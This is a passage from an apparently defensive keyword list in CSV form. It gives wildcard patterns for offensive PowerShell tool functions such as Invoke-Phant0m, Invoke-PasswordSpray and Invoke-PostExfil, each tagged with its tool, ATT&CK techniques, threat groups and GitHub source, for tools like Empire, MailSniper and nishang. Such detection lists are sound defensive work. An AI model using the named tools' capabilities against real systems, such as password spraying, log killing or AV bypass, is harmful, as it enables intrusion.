Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PasswordSpray*","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire 
scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Phant0m*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*Invoke-Phant0m*","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. 
I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Invoke-Phant0m*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Invoke-Phant0m.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Phant0m.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 
- TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*Invoke-Phant0m.ps1*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*invoke-pipekat *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-Piper*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*Invoke-PiperClient*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral 
movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*Invoke-PiperServer*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"*Invoke-PipeShell.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PortBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Portscan*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PortScan*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-Portscan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PortScan*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-Portscan*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Portscan.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Portscan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PoshRatHttps*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
